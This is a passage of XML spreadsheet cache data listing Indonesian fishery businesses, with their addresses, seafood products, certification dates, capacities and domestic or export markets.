    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-01-06T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23174"/>
    <x v="812"/>
    <s v="PT. MEGAH WAHANA MAKMUR"/>
    <s v="Pelabuhan Muara Baru Ujung Jl. Tuna 1 Blok K4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Deho, Lemadang, Marlin, Salem, Sarden)"/>
    <d v="2021-01-06T00:00:00"/>
    <n v="750000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Tangerang"/>
    <s v="China, Japan, Philippines, Thailand"/>
  </r>
  <r>
    <n v="23175"/>
    <x v="812"/>
    <s v="PT. MEGAH WAHANA MAKMUR"/>
    <s v="Pelabuhan Muara Baru Ujung Jl. Tuna 1 Blok K4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Lencam, Kerapu, Layur, Kakap Merah, Baronang)"/>
    <d v="2021-01-06T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Tangerang"/>
    <s v="China, Japan, Philippines, Thailand"/>
  </r>
  <r>
    <n v="23176"/>
    <x v="813"/>
    <s v="UD. ZULFALIN"/>
    <s v="PPI GOTO, Kel. Tomalou, Kec. Tidore Selatan, Kota Tidore Kepulauan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Layang, Cakalang)"/>
    <d v="2020-11-19T00:00:00"/>
    <s v="70 000"/>
    <s v="Kota Surabaya, Kota Bitung"/>
    <m/>
  </r>
  <r>
    <n v="23178"/>
    <x v="635"/>
    <s v="CV. SEMBADA"/>
    <s v="Desa Sobontoro RT 002 RW 003, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Pari Beku"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="23179"/>
    <x v="635"/>
    <s v="CV. SEMBADA"/>
    <s v="Desa Sobontoro RT 002 RW 003, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-11-19T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="23181"/>
    <x v="814"/>
    <s v="PT. LAUTAN BAHARI SEJAHTERA"/>
    <s v="Jl. Muara Baru, Perum PPSJ Pelabuhan Nizam Zachman Blok J No.7, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-30T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="Philippines, Singapore, United States"/>
  </r>
  <r>
    <n v="23183"/>
    <x v="814"/>
    <s v="PT. LAUTAN BAHARI SEJAHTERA"/>
    <s v="Jl. Muara Baru, Perum PPSJ Pelabuhan Nizam Zachman Blok J No.7, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2020-11-30T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23184"/>
    <x v="814"/>
    <s v="PT. LAUTAN BAHARI SEJAHTERA"/>
    <s v="Jl. Muara Baru, Perum PPSJ Pelabuhan Nizam Zachman Blok J No.7, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemadang, Marlin, Cakalang, Tenggiri, Todak)"/>
    <d v="2020-11-30T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="23185"/>
    <x v="814"/>
    <s v="PT. LAUTAN BAHARI SEJAHTERA"/>
    <s v="Jl. Muara Baru, Perum PPSJ Pelabuhan Nizam Zachman Blok J No.7, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-30T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="23186"/>
    <x v="815"/>
    <s v="LERISKA"/>
    <s v="Korong Pasa Gelombang Nagari Kayu Tanam, Kel. Kayu Tanam, Kec. 2x11 Kayu Tanam, Kabupaten Padang Pariaman&lt;br&gt;Sumatera Barat"/>
    <n v="3"/>
    <s v="Lele Asap"/>
    <d v="2020-11-16T00:00:00"/>
    <n v="600"/>
    <s v="Kabupaten Padang Pariaman, Kota Padang, Kota Pariaman"/>
    <m/>
  </r>
  <r>
    <n v="23187"/>
    <x v="815"/>
    <s v="LERISKA"/>
    <s v="Korong Pasa Gelombang Nagari Kayu Tanam, Kel. Kayu Tanam, Kec. 2x11 Kayu Tanam, Kabupaten Padang Pariaman&lt;br&gt;Sumatera Barat"/>
    <n v="3"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Nugget Ikan, Kaki Naga Ikan)"/>
    <d v="2020-11-16T00:00:00"/>
    <n v="300"/>
    <s v="Kabupaten Padang Pariaman, Kota Padang, Kota Pariaman"/>
    <m/>
  </r>
  <r>
    <n v="23188"/>
    <x v="815"/>
    <s v="LERISKA"/>
    <s v="Korong Pasa Gelombang Nagari Kayu Tanam, Kel. Kayu Tanam, Kec. 2x11 Kayu Tanam, Kabupaten Padang Pariaman&lt;br&gt;Sumatera Barat"/>
    <n v="3"/>
    <s v="Stik Ikan"/>
    <d v="2020-11-16T00:00:00"/>
    <n v="240"/>
    <s v="Kabupaten Padang Pariaman, Kota Padang, Kota Pariaman"/>
    <m/>
  </r>
  <r>
    <n v="23189"/>
    <x v="815"/>
    <s v="LERISKA"/>
    <s v="Korong Pasa Gelombang Nagari Kayu Tanam, Kel. Kayu Tanam, Kec. 2x11 Kayu Tanam, Kabupaten Padang Pariaman&lt;br&gt;Sumatera Barat"/>
    <n v="3"/>
    <s v="Rendang Salai Lele"/>
    <d v="2020-11-16T00:00:00"/>
    <n v="120"/>
    <s v="Kabupaten Padang Pariaman, Kota Padang, Kota Pariaman"/>
    <m/>
  </r>
  <r>
    <n v="23190"/>
    <x v="201"/>
    <s v="PT. LUCKY SAMUDRA PRATAMA"/>
    <s v="Jl. Muara Baru Ujung Blok F No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Pari Beku"/>
    <d v="2020-11-27T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Australia, China, United States"/>
  </r>
  <r>
    <n v="23191"/>
    <x v="201"/>
    <s v="PT. LUCKY SAMUDRA PRATAMA"/>
    <s v="Jl. Muara Baru Ujung Blok F No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Segar"/>
    <d v="2020-11-27T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23192"/>
    <x v="201"/>
    <s v="PT. LUCKY SAMUDRA PRATAMA"/>
    <s v="Jl. Muara Baru Ujung Blok F No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Pari Segar"/>
    <d v="2020-11-27T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23193"/>
    <x v="816"/>
    <s v="CV. SINAR ABADI"/>
    <s v="Dusun Morbeddih RT 002 RW 003, Kel. Panaguan, Kec. Larangan, Kabupaten Pamekasan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Mata Besar, Kerapu, Layur, Kakatua, Bawal, Kakap)"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="80000"/>
    <s v="Kabupaten Pamekasan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23194"/>
    <x v="816"/>
    <s v="CV. SINAR ABADI"/>
    <s v="Dusun Morbeddih RT 002 RW 003, Kel. Panaguan, Kec. Larangan, Kabupaten Pamekasan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Marlin, Salem, Tenggiri, Pedang)"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="80000"/>
    <s v="Kabupaten Pamekasan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23197"/>
    <x v="342"/>
    <s v="CV. BEE JAY SEAFOODS"/>
    <s v="Jl. Tanjung Tembaga Barat Pelabuhan Mayangan, Kel. Mayangan, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demesal Beku (Gulama, Lencam, Kerapu, Kakap, Kurisi)"/>
    <d v="2021-01-15T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="Australia, Malaysia"/>
  </r>
  <r>
    <n v="23198"/>
    <x v="817"/>
    <s v="PT. GRAHA INSAN SEJAHTERA"/>
    <s v="Jl. Muara Baru Ujung Blok O Kav 1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Flounder, Kerapu, Layur, Kakatua, Bawal, Kakap)"/>
    <d v="2020-12-04T00:00:00"/>
    <n v="195000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Cirebon, Kabupaten Indramayu, Kabupaten Bekasi, Kabupaten Semarang, Kota Surabaya, Kabupaten Tangerang"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Mauritius, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23199"/>
    <x v="817"/>
    <s v="PT. GRAHA INSAN SEJAHTERA"/>
    <s v="Jl. Muara Baru Ujung Blok O Kav 1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Bonito, Cobia, Kembung, Gindara, Salem, Cakalang, Tenggiri, Pedang)"/>
    <d v="2020-12-04T00:00:00"/>
    <n v="170000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Cirebon, Kabupaten Indramayu, Kabupaten Bekasi, Kabupaten Semarang, Kota Surabaya, Kabupaten Tangerang, Kabupaten Serang"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Mauritius, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23200"/>
    <x v="817"/>
    <s v="PT. GRAHA INSAN SEJAHTERA"/>
    <s v="Jl. Muara Baru Ujung Blok O Kav 1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-12-04T00:00:00"/>
    <n v="125000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Cirebon, Kabupaten Indramayu, Kabupaten Bekasi, Kabupaten Semarang, Kabupaten Tangerang, Kabupaten Serang"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Mauritius, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23201"/>
    <x v="817"/>
    <s v="PT. GRAHA INSAN SEJAHTERA"/>
    <s v="Jl. Muara Baru Ujung Blok O Kav 1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-12-04T00:00:00"/>
    <n v="125000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Cirebon, Kabupaten Bekasi, Kabupaten Semarang, Kota Surabaya, Kabupaten Tangerang, Kabupaten Serang"/>
    <s v="China, Japan, Mauritius, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23206"/>
    <x v="302"/>
    <s v="KOPERASI PANIPAHAN SEJAHTERA"/>
    <s v="Jl. Bakti No. 976, Kel. Panipahan Darat, Kec. Pasir Limau Kapas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Kering"/>
    <d v="2020-12-16T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23207"/>
    <x v="302"/>
    <s v="KOPERASI PANIPAHAN SEJAHTERA"/>
    <s v="Jl. Bakti No. 976, Kel. Panipahan Darat, Kec. Pasir Limau Kapas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Pelagis Segar (Tenggiri, Parang-parang)"/>
    <d v="2020-12-16T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23208"/>
    <x v="600"/>
    <s v="PT. GOLDEN BRIDGE INTERNATIONAL"/>
    <s v="Jl. Raya Cileungsi RT 016 RW 005, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Kakatua, Kakap, Lodem)"/>
    <d v="2020-11-27T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23209"/>
    <x v="600"/>
    <s v="PT. GOLDEN BRIDGE INTERNATIONAL"/>
    <s v="Jl. Raya Cileungsi RT 016 RW 005, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Kepiting Kulit Lunak Beku"/>
    <d v="2020-11-27T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23210"/>
    <x v="818"/>
    <s v="CV. SURYA UTARA JAYA"/>
    <s v="Jl. Sinaboi Kecil Kuala, Kel. Sungai Bakau, Kec. Sinaboi, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Demersal Segar (Sebelah)"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23211"/>
    <x v="818"/>
    <s v="CV. SURYA UTARA JAYA"/>
    <s v="Jl. Sinaboi Kecil Kuala, Kel. Sungai Bakau, Kec. Sinaboi, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Pelagis Segar (Senangin, Tenggiri)"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23212"/>
    <x v="818"/>
    <s v="CV. SURYA UTARA JAYA"/>
    <s v="Jl. Sinaboi Kecil Kuala, Kel. Sungai Bakau, Kec. Sinaboi, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Kering"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23213"/>
    <x v="818"/>
    <s v="CV. SURYA UTARA JAYA"/>
    <s v="Jl. Sinaboi Kecil Kuala, Kel. Sungai Bakau, Kec. Sinaboi, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Segar"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23214"/>
    <x v="819"/>
    <s v="PT. INDO BALI"/>
    <s v="Jl. Raya Pengambengan, Kel. Tegalbadeng Barat, Kec. Negara, Kabupaten Jembrana&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Sarden Kaleng"/>
    <d v="2020-12-16T00:00:00"/>
    <n v="1500000"/>
    <s v="Kota Medan, Kota Padangsidimpuan, Kota Bukittinggi, Kota Jambi, Kota Palembang, Kota Surabaya, Kota Banjarmasin, Kota Gorontalo"/>
    <m/>
  </r>
  <r>
    <n v="23218"/>
    <x v="820"/>
    <s v="PT. HOKKIE SAMUDRA TRIJAYA"/>
    <s v="Jl. Muara Baru Dermaga Timur Transit RT 20 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-03-05T00:00:00"/>
    <n v="1188000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23219"/>
    <x v="820"/>
    <s v="PT. HOKKIE SAMUDRA TRIJAYA"/>
    <s v="Jl. Muara Baru Dermaga Timur Transit RT 20 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2021-03-05T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23220"/>
    <x v="820"/>
    <s v="PT. HOKKIE SAMUDRA TRIJAYA"/>
    <s v="Jl. Muara Baru Dermaga Timur Transit RT 20 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemadang, Marlin, Gindara, Layang, Cakalang, Pedang, Tenggiri)"/>
    <d v="2021-03-05T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Korea, Democratic People's Republic of, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23221"/>
    <x v="820"/>
    <s v="PT. HOKKIE SAMUDRA TRIJAYA"/>
    <s v="Jl. Muara Baru Dermaga Timur Transit RT 20 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-05T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Korea, Democratic People's Republic of, Philippines, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23222"/>
    <x v="821"/>
    <s v="CV. ADHYATAMA PRAKARSA (PEMPEK CEK MOLEK)"/>
    <s v="Jl. Kapten A Rivai No.63A, Kel. 26 Ilir, Kec. Bukit Kecil, Kota Palembang&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Pempek Ikan"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Padang, Kota Palembang, Kota Jakarta Pusat, Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="23223"/>
    <x v="822"/>
    <s v="CV. TIGA A"/>
    <s v="Pergudangan Bizpark Blok B1 No.15, Jl. Gubernur Soebardjo Lingkar Selatan, Kel. Kayu Bawang, Kec. Gambut, Kabupaten Banjar&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Ikan Demersal Segar (Malong,  Barramundi, Kerapu, Layur, Kakatua, Bawal, Kakap, Kurisi)"/>
    <d v="2021-04-05T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="23224"/>
    <x v="822"/>
    <s v="CV. TIGA A"/>
    <s v="Pergudangan Bizpark Blok B1 No.15, Jl. Gubernur Soebardjo Lingkar Selatan, Kel. Kayu Bawang, Kec. Gambut, Kabupaten Banjar&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Ikan Pelagis Segar (Barakuda, Kuwe, Cakalang, Tenggiri)"/>
    <d v="2021-04-05T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="23225"/>
    <x v="822"/>
    <s v="CV. TIGA A"/>
    <s v="Pergudangan Bizpark Blok B1 No.15, Jl. Gubernur Soebardjo Lingkar Selatan, Kel. Kayu Bawang, Kec. Gambut, Kabupaten Banjar&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Rajungan Segar"/>
    <d v="2021-04-05T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="23226"/>
    <x v="822"/>
    <s v="CV. TIGA A"/>
    <s v="Pergudangan Bizpark Blok B1 No.15, Jl. Gubernur Soebardjo Lingkar Selatan, Kel. Kayu Bawang, Kec. Gambut, Kabupaten Banjar&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Udang Segar"/>
    <d v="2021-04-05T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="23227"/>
    <x v="822"/>
    <s v="CV. TIGA A"/>
    <s v="Pergudangan Bizpark Blok B1 No.15, Jl. Gubernur Soebardjo Lingkar Selatan, Kel. Kayu Bawang, Kec. Gambut, Kabupaten Banjar&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Kepiting Hidup"/>
    <d v="2021-04-05T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="23228"/>
    <x v="822"/>
    <s v="CV. TIGA A"/>
    <s v="Pergudangan Bizpark Blok B1 No.15, Jl. Gubernur Soebardjo Lingkar Selatan, Kel. Kayu Bawang, Kec. Gambut, Kabupaten Banjar&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Belut Hidup"/>
    <d v="2021-04-05T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="23230"/>
    <x v="302"/>
    <s v="KOPERASI PANIPAHAN SEJAHTERA"/>
    <s v="Jl. Bakti No. 976, Kel. Panipahan Darat, Kec. Pasir Limau Kapas, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Demersal Segar (Kakap Putih, Sebelah, Senangin, Manyung, Bawal)"/>
    <d v="2020-12-16T00:00:00"/>
    <n v="700000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23231"/>
    <x v="823"/>
    <s v="CV. TIGA PUTERA THIRTA"/>
    <s v="Pergudangan Bandara Mas Blok F No.12, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Hidup"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23232"/>
    <x v="823"/>
    <s v="CV. TIGA PUTERA THIRTA"/>
    <s v="Pergudangan Bandara Mas Blok F No.12, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Ronggeng Hidup"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23233"/>
    <x v="823"/>
    <s v="CV. TIGA PUTERA THIRTA"/>
    <s v="Pergudangan Bandara Mas Blok F No.12, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Hidup"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23234"/>
    <x v="823"/>
    <s v="CV. TIGA PUTERA THIRTA"/>
    <s v="Pergudangan Bandara Mas Blok F No.12, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Belut Hidup"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23235"/>
    <x v="823"/>
    <s v="CV. TIGA PUTERA THIRTA"/>
    <s v="Pergudangan Bandara Mas Blok F No.12, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerapu Hidup"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23236"/>
    <x v="824"/>
    <s v="CV, BRIGHTFOOD RIUNG GUNUNG"/>
    <s v="Jl, Cikadut Atas No,33 RT 03 RW 05, Kel, Karang Pamulang, Kec, Mandalajati, Kota Bandung&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Nugget Ikan, Batagor Ikan, Cuankie Ikan, Cilok Ikan)"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="9600"/>
    <s v="Kota Jakarta Pusat, Kabupaten Bandung, Kabupaten Karawang, Kabupaten Bekasi, Kabupaten Bandung Barat, Kota Bandung, Kota Bekasi, Kota Depok"/>
    <m/>
  </r>
  <r>
    <n v="23238"/>
    <x v="825"/>
    <s v="MAK MIL FROZEN FOOD"/>
    <s v="Perum Taman Hang Tuah Blok A5 No.14 RT 001 RW 006, Kel. Baloi Permai, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Naget Ikan, Roll Ikan, Otak-otak Ikan, Cone Ikan) "/>
    <d v="2020-11-27T00:00:00"/>
    <n v="480"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="23241"/>
    <x v="826"/>
    <s v="UD. BUNDA FOODS"/>
    <s v="RT 01 RW 01, Kel. Penatarsewu, Kec. Tanggulangin, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Bandeng Asap"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="200"/>
    <s v="Kota Jakarta Timur, Kabupaten Sidoarjo, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23242"/>
    <x v="826"/>
    <s v="UD. BUNDA FOODS"/>
    <s v="RT 01 RW 01, Kel. Penatarsewu, Kec. Tanggulangin, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Kupang Krispy"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Timur, Kabupaten Sidoarjo, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23243"/>
    <x v="826"/>
    <s v="UD. BUNDA FOODS"/>
    <s v="RT 01 RW 01, Kel. Penatarsewu, Kec. Tanggulangin, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Abon Ikan"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Timur, Kota Semarang, Kabupaten Sidoarjo, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23246"/>
    <x v="826"/>
    <s v="UD. BUNDA FOODS"/>
    <s v="RT 01 RW 01, Kel. Penatarsewu, Kec. Tanggulangin, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Rolade Ikan, Ekado, Otak-otak Bandeng) "/>
    <d v="2020-12-29T00:00:00"/>
    <n v="1000"/>
